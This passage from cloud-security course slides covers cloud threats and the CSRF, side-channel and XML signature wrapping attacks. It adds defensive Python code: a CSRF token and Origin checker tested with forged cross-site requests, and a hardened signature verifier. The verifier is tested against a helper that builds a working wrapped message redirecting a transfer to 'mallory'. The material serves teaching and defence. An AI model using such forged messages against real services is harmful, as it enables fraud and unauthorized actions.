  • Shared by several organizations with common needs and security goals
353
Security Threats in the Cloud
• Large data breaches more common
• Data loss (data might not just be copied and
stolen but inadvertently deleted)
• Accounts and services may be hijacked and
credentials intercepted
• Cloud APIs may be insecure
• DoS also affects cloud

354
More Security Threats in the Cloud
• Malicious insiders or poor security practices at the cloud service
• Use of cloud services by attackers to scale their attacks
• Multitenancy
  • Various clients reside on the same machine.
  • A flaw in implementation could compromise security.
• Laws and Regulations
  • The consumer retains the ultimate responsibility for compliance.
355
Cloud Computing Attacks
• Session Riding (aka Cross-Site Request Forgery)
  • Tricks a user into sending a request that runs with their privileges and context
• Side Channel Attacks
  • Potentially devastating but require skill and luck on the attacker’s part
• Signature Wrapping Attacks
  • Rely on altering web service SOAP and XML content while preserving the signed element’s ID

356
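Session riding works because the browser attaches the session cookie to every request regardless of which site built it, so the server cannot take the cookie as proof of the user's intent. The standard control is a synchronizer token that only the application's own pages can embed, checked on every state-changing request, with the Origin header as a second check. The following is an added example for these notes, not code from the course; the requests are constructed dicts standing in for what a web framework hands over, and the secret, session id and allowed origin are constructed values.

```python
"""Server-side defence against session riding (CSRF): a session-bound synchronizer
token plus an Origin check.  Added example for these notes, not code from the course.
Requests are constructed dicts standing in for what a web framework would hand over."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)        # constructed; a real app keeps this in config
ALLOWED_ORIGINS = {"https://app.example"}      # constructed site origin
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session_id):
    """Token the server embeds in its own forms; bound to the session so it can't be reused elsewhere."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(headers):
    """Origin header, falling back to the Referer's scheme+host; None if neither is present."""
    raw = headers.get("Origin") or headers.get("Referer")
    if not raw:
        return None
    parts = urlsplit(raw)          # exact scheme+host comparison, not a prefix match
    return f"{parts.scheme}://{parts.netloc}"


def authorize_request(request, session_id):
    """Decide whether a request carrying a valid session cookie reflects the user's intent.

    session_id is the server's view of the cookie the browser attached automatically,
    which is exactly why the cookie alone proves nothing about who built the request.
    Returns (allowed, reason)."""
    if request["method"].upper() not in STATE_CHANGING:
        return True, "safe method"
    origin = _origin_of(request.get("headers", {}))
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "origin mismatch"
    submitted = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(submitted, issue_csrf_token(session_id)):
        return False, "bad csrf token"
    return True, "ok"


# Constructed requests.  All carry the same session cookie; only the first was
# built by the application's own page and so carries the token.
SESSION = "sess-constructed-123"
LEGIT_POST = {"method": "POST", "headers": {"Origin": "https://app.example"},
              "form": {"to": "alice", "amount": "10", "csrf_token": issue_csrf_token(SESSION)}}
CROSS_SITE_POST = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
                   "form": {"to": "mallory", "amount": "1000"}}
NO_ORIGIN_POST = {"method": "POST", "headers": {},
                  "form": {"to": "mallory", "amount": "1000"}}
PLAIN_GET = {"method": "GET", "headers": {}, "form": {}}


def run_sample():
    """Verdict for each constructed request under the same session."""
    return {name: authorize_request(req, SESSION) for name, req in
            [("legit", LEGIT_POST), ("cross_site", CROSS_SITE_POST),
             ("no_origin", NO_ORIGIN_POST), ("get", PLAIN_GET)]}


if __name__ == "__main__":
    for name, verdict in run_sample().items():
        print(name, verdict)
```

The "safe method" branch assumes GET never changes state; an application that performs actions on GET defeats this check no matter how the token is handled. The Origin check is compared as scheme plus host rather than as a string prefix, so a lookalike host such as app.example.evil is not accepted.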
Controls for Cloud Security
• Secure design and architecture are key
• Identity and access management as important or
more important in the cloud
• Governance (ensures that the policies, procedures,
and standards are deployed and enforced)
• Risk management and compliance
• Consider availability and uptime QoS/SLA of your
cloud provider

357
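The "secure design" control above is best seen against a concrete flaw, so here is the signature wrapping attack listed on the preceding slide with the check that closes it. The point of wrapping is that a verifier looks up the signed part by its ID while the application processes whatever sits at the expected position, and those can be two different elements. This is an added example for these notes, not code from the course: the envelope is a constructed, namespace-free stand-in for SOAP, and an HMAC over the serialized Body stands in for a real XML signature, so only the verify-versus-process logic is shown. The wrapped document is built in code purely as a regression input for the two verifiers.

```python
"""Signature wrapping check for a SOAP-style message.  Added example for these
notes, not code from the course.  The envelope is a constructed, namespace-free
stand-in for SOAP, and an HMAC over the serialized Body stands in for XMLDSig,
so the point (which element was verified versus which was processed) is visible."""
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET

KEY = b"constructed-shared-key"   # stand-in for real signing key material

LEGIT = '<Envelope><Header/><Body Id="body"><Transfer to="alice" amount="10"/></Body></Envelope>'


def canonical(element):
    """Serialize one element without its tail text (a crude stand-in for C14N)."""
    clone = copy.deepcopy(element)
    clone.tail = None
    return ET.tostring(clone, encoding="utf-8")


def mac_of(element):
    return hmac.new(KEY, canonical(element), hashlib.sha256).hexdigest()


def sign(envelope_xml):
    """Sign the Body by Id reference, the way a SOAP signature points at a signed part."""
    root = ET.fromstring(envelope_xml)
    body = root.find("Body")
    sig = ET.SubElement(root.find("Header"), "Signature", Reference="#" + body.get("Id"))
    sig.text = mac_of(body)
    return ET.tostring(root, encoding="unicode")


def _reference(root):
    sig = root.find("Header/Signature")
    return sig.get("Reference")[1:], sig.text


def naive_verify_and_extract(envelope_xml):
    """Vulnerable pattern: verify whichever element carries the referenced Id,
    then process root/Body without checking they are the same element."""
    root = ET.fromstring(envelope_xml)
    ref_id, mac = _reference(root)
    signed = next((e for e in root.iter() if e.get("Id") == ref_id), None)
    if signed is None or not hmac.compare_digest(mac, mac_of(signed)):
        return None
    return root.find("Body/Transfer").attrib


def hardened_verify_and_extract(envelope_xml):
    """Hardened: the Id must be unique, the referenced element must be the Body
    that will be processed, and only that element's contents are returned."""
    root = ET.fromstring(envelope_xml)
    ref_id, mac = _reference(root)
    matches = [e for e in root.iter() if e.get("Id") == ref_id]
    if len(matches) != 1:
        return None                      # duplicated or missing Id
    signed = matches[0]
    if signed is not root.find("Body"):
        return None                      # signed part is not where the processor looks
    if not hmac.compare_digest(mac, mac_of(signed)):
        return None
    return signed.find("Transfer").attrib


def wrapped_test_case(signed_xml, new_id="body"):
    """Constructed regression input for the verifiers: the original signed Body is moved
    under Header/Wrapper (so its Id and MAC still match) and a new Body takes its place."""
    root = ET.fromstring(signed_xml)
    original_body = root.find("Body")
    root.remove(original_body)
    ET.SubElement(root.find("Header"), "Wrapper").append(original_body)
    new_body = ET.SubElement(root, "Body", Id=new_id)
    ET.SubElement(new_body, "Transfer", to="mallory", amount="1000000")
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    signed = sign(LEGIT)
    print("naive   :", naive_verify_and_extract(wrapped_test_case(signed)))
    print("hardened:", hardened_verify_and_extract(wrapped_test_case(signed)))
```

The hardened verifier rejects the wrapped message twice over: when the inserted Body reuses the signed Id the uniqueness check fails, and when it uses a fresh Id the identity check fails because the signed element is no longer the Body. Either way the application only ever acts on data whose bytes were covered by the signature.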
Testing Security in the Cloud
• SOASTA CloudTest
• LoadStorm
• BlazeMeter
• Nexpose
• AppThwack
• Jenkins Dev@Cloud
• Xamarin Test Cloud

358
Quiz Time

359
Thank you

360
